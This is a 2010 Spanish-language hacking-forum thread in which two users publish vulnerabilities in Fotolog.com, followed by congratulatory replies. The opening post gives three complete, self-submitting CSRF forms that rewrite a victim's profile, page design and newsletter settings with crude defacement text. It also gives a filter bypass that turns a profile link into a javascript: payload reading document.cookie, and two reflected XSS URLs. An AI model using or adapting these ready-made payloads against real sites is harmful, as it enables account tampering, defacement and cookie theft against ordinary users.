elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Fede_cp y Castg! Simple disclosure de Fotolog.com! xD
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: Fede_cp y Castg! Simple disclosure de Fotolog.com! xD  (Leído 17,649 veces)
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Fede_cp y Castg! Simple disclosure de Fotolog.com! xD
« en: 7 Febrero 2010, 06:03 am »

bueno bueno, que mas, les voy a contar TODO! porq quiero un post bien larguito xD! y en tambien esta en el blog este mismo post (osea apreto enviar, lo copio y pego en el blog xD!)

empiezo, taba en la casa de fede y me mostro un csrf para borrar comentarios de las fotos, bueno, pasa que este es re conocido :p y dijimos, bueno, ya encontramos 2 xss y un "ftp" de la api de fotolog(aunque no lo sepan, el genio de fede en el dominio http://si.fotolog.com/i94/ encontro que estaban habilitados los indexes de apache yse podia navegar por los codigos fuentes de fotolog xD! testigos: WHK y SDC) y los xss uno lo encontro fede hace banda en el "redirect=" del cambio de idioma y yo hace poco (solo funciona en IE) otro medio raro, pero no taban tan piolas, la cosa era encontrar mas, mejor cantidad y menos calidad. nos pusimos a ver el perfil y a modificarlo, nos dimos cuenta que no pedia contraseña como en otros casos, vimos el codigo fuente del formulario y tampoco tenia token.
Wow! copiamos el formulario y empezamos a depurar, ni bien empezamos nos tubimos que ir (para mi casa xD!) y aca (en mi casa  ;-)) despues de boludear y boludear, encontramos otro csrf, pero no depuramos nada ni tampoco usamos el otro fichero, el de la casa de fede.

entonces hoy agarro y digo (ya solito en mi casa y fede en la suya) postiemos los 2 CSRF en elhacker.net asi [ego]ven que tanto inteligentes somos![/ego] y cunado me pongo a buscar los formularios, a depurar (que llevo su tiempo la verdad!!) y todo eso, me propongo buscar mas csrf, y encontre uno mas, boludiando por el perfil tambien me di cuenta que baypaseando se puede agregar un link a: "javascript:alert(1)" y por ultimo encontre otro xss. al ver esto decimos, en que garcha subimos nuestras fotos?, y si, es una garcha. jajaj. ahora voy a poner los formularios de los CSRF seguido de como baypasear y despues donde esta el xss.
Guarda con los formularios porq se mandan solos automaticamente se abren...

1er formulario: (este modifica los datos personales...)

Código
  1. <body onload="document.update_prefs.submit()">
  2. <form id="settings" action="http://account.fotolog.com/profile" name="update_prefs" method="post" enctype="multipart/form-data">
  3. <input type="hidden" class="checkbox" id="display_bio" name="display_bio" checked value="true">
  4. <input type="hidden" id="bio_statement" name="bio_statement" wrap="virtual" value="Te cabieron el pote!">
  5. <input type="hidden" class="checkbox" id="display_image" name="display_image" checked value="false">
  6. <input type="hidden" id="image" name="image" class="lg">
  7. <input type="hidden" id="firstname" name="firstname" class="lg" value="Me ponwearon" maxlength="32">
  8. <input type="hidden" id="lastname" name="lastname" class="lg" value="Fede_cp y Castg" maxlength="32">
  9. <input type="hidden" class="radio" name="gender" id="g_0" value="0">
  10. <input type="hidden" class="radio" name="gender" id="g_1" value="1">
  11. <input type="hidden" class="radio" name="gender" id="g_2" value="2">
  12. <input type="hidden" id="profession" name="profession" class="lg" value="Ser powneado :'(" maxlength="40">
  13. <input type="hidden" class="med" name="new:plink:0:name" value="Castg! y Fede_cp son los ***** amos!" maxlength="64">
  14. <input type="hidden" class="med" name="new:plink:0:url" value="http://google.com" maxlength="64">
  15. <input type="hidden" class="med" name="new:plink:1:name" value="xss no, terrible pelotudes see!!!" maxlength="64">
  16. <input type="hidden" class="med" name="new:plink:1:url" value="javasjavascript:cript:alert(document.cookie)" maxlength="64">
  17. <input type="hidden" class="checkbox" name="delete:new:plink:0">
  18. <input type="hidden" class="checkbox" name="delete:new:plink:1">
  19. <input type="hidden" name="new:plink:1" value="1">
  20. <input type="hidden" id="country" name="country" value="_N">
  21. <input type="hidden" id="state" name="state" value="00">
  22. <input type="hidden" name="city" id="city" maxlength="128" class="med" value="El ciber mundo!">
  23. <input type="hidden" name="language" value="tr">
  24. <input type="hidden" name="new:camera:0:type" value="3">
  25. <input type="hidden" id="fotolog_description" name="fotolog_description" wrap="virtual" value=":P">
  26. <input type="hidden" name="new:camera:0:brand" value="Logitech" class="sm" maxlength="32">
  27. <input type="hidden" name="new:camera:0:model" value="¿?" class="sm" maxlength="32">
  28. <input type="hidden" type="checkbox" name="delete:new:camera:0">
  29. <input type="hidden" name="new:camera:0" value="1">
  30. <input type="hidden" id="music" name="music" wrap="virtual" class="med" value="Reggae con un fasito!">
  31. <input type="hidden" id="movies" name="movies" wrap="virtual" value="Garganta Profunda (busquen en el puto google ¬¬)">
  32. <input type="hidden" id="sports" name="sports" wrap="virtual" value="Lucha en el barro!">
  33. <input type="hidden" class="med" name="new:favlink:0:name" value="I'm cagado!" maxlength="64">
  34. <input type="hidden" class="med" name="new:favlink:0:url" value="http://google.com" maxlength="64">
  35. <input type="hidden" class="checkbox" name="delete:new:favlink:0">
  36. <input type="hidden" name="new:favlink:0" value="1">
  37. </form>
  38. </body>

2do formulario: (este modifica los colores y titulo...)

Código
  1. <body onload="document.update_prefs.submit()">
  2. <form name="update_prefs" action="http://account.fotolog.com/page_design" id="settings" method="post" enctype="multipart/form-data">
  3. <input type="hidden" name="title" value="Me cabieron el pote!">
  4. <input type="hidden" name="margin_txt_color" value="FFFFFF">
  5. <input type="hidden" name="margin_link_color" value="33FF00">
  6. <input type="hidden" name="margin_bg_color" value="FFFF00">
  7. <input type="hidden" name="text_color" value="FFFFFF">
  8. <input type="hidden" name="hyperlink_text_color" value="FFFF00">
  9. <input type="hidden" name="background_color" value="FFFF00">
  10. </form>
  11. </body>

3er formulario: (noticias por mail... "newlestter")

Código
  1. <body onload="document.update_prefs.submit()">
  2. <form name="update_prefs" method="post" enctype="multipart/form-data" id="settings">
  3. <input type="hidden" name="receive_email_digest" value="true">
  4. <input type="hidden" name="receive_updates" value="true">
  5. <input type="hidden" name="receive_newsletter" value="true">
  6. <input type="hidden" name="receive_promotionals" value="true">
  7. </form>
  8. </body>

la verdad son re boludos, pero quiera uno o no! jajaj



Bypass en URL: (el bypass lo descubrio favaloro, un medico argentino)

bueno, en http://account.fotolog.com/profile en la parte de enlaces personales ponen el nombre q se les cante, si son floggers ponegan "mail de cumbio" y pican al toq xD!, y en url si ponen javascript:alert(1); se los transforma en http://alert(1)/; entonces si ponemos javasjavascript:cript:alert(1); borra el javascript armado, uniendo los separados . entonces cuando ponen click en el "link" saltara un alert con el mesaje "1".



XSS: (aca no tengo nada para poner :p)

muy simple,
aca uno: (salta 5 veces) http://txn.fotolog.com/gift_store?u=%22%3E%3Cscript%3Ealert%28%27xss%20by%20castg%27%29;%3C/script%3E

aca otro parecido pero nomas que saltan 7 :P : http://txn.fotolog.com/gift_store?id=712&u=%22%3E%3Cscript%3Ealert(%27xss%20by%20castg%27);%3C/script%3E



bueno, este fue un capitulo de fede_castg, espero que les haya gustado y... chau. jajaj

Aviso que mande dos mails al webmaster, ahora q se jodan xD!
En línea

fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: Fede_cp y Castg! Simple disclosure de Fotolog.com! xD
« Respuesta #1 en: 7 Febrero 2010, 06:09 am »

Agredecimiento a la maquina castg!, mira como quedaron los codes jajajaja, era un Quil0mbo al principio.

de verdad Te pasaste!!!

a ver cuando nos juntamos una vez mas y a la ***** con fotolog ajjajajja.


saludos gente!

PD. ya va en el blog con colorcito y todo
En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: Fede_cp y Castg! Simple disclosure de Fotolog.com! xD
« Respuesta #2 en: 7 Febrero 2010, 06:14 am »

igualmente falto un toq de depuracion, pero como no es nada profesional esto de fotolog, y mis codigos tampoco xD! [indirecta!]
En línea

AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.705


🏴 Libertad!!!!!


Ver Perfil WWW
Re: Fede_cp y Castg! Simple disclosure de Fotolog.com! xD
« Respuesta #3 en: 7 Febrero 2010, 06:17 am »

haha se pasan compañeros, buen trabajo por el review de fotolog

Saludos
En línea

Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: Fede_cp y Castg! Simple disclosure de Fotolog.com! xD
« Respuesta #4 en: 7 Febrero 2010, 06:20 am »

muchas gracias anon, me motiva mucho que una persona como vos nos diga eso ^_^
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Fede_cp y Castg! Simple disclosure de Fotolog.com! xD
« Respuesta #5 en: 7 Febrero 2010, 06:51 am »

Good Work!



empiezo, taba en la casa de fede
Cuanto daria por tener un amigo, cerca de casa, para poder hablar, compatir información, ademas de realizar pruebas, los envidio... :P
« Última modificación: 7 Febrero 2010, 06:55 am por Shell Root » En línea

Te vendería mi talento por poder dormir tranquilo.
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: Fede_cp y Castg! Simple disclosure de Fotolog.com! xD
« Respuesta #6 en: 7 Febrero 2010, 07:00 am »

jeje, si, sinceramente es necesario. fede estuvo de vacaciones cuando yo volvia de las mias, y cuando nos juntabamos todos los pibes, pe sentia un pelotudo hablando de informatica y que me pregunten que eraun linux ! :B jajjaj. epro no todo lo es la computacion, la amistad es mucho mas. (sono gay na?) xD
En línea

fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: Fede_cp y Castg! Simple disclosure de Fotolog.com! xD
« Respuesta #7 en: 7 Febrero 2010, 07:05 am »

jajaja, si no conozco a muchos que se junten asi en una casa, se ocurren cosas muy buenas.!!


gracias por la buena onda


saludos
En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: Fede_cp y Castg! Simple disclosure de Fotolog.com! xD
« Respuesta #8 en: 7 Febrero 2010, 07:06 am »

pero guarda porq aveces duele y no te podes sentar  :silbar:
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Fede_cp y Castg! Simple disclosure de Fotolog.com! xD
« Respuesta #9 en: 7 Febrero 2010, 07:12 am »

pero guarda porq aveces duele y no te podes sentar  :silbar:
:o
En línea

Te vendería mi talento por poder dormir tranquilo.
Páginas: [1] 2 3 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Firma dinamica Castg! version 1.1 [PHP]
PHP
Castg! 0 2,530 Último mensaje 19 Enero 2011, 00:36 am
por Castg!
Firma dinámica [Castg] - Depurado
PHP
Castg! 1 4,179 Último mensaje 31 Marzo 2012, 11:20 am
por Og.
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines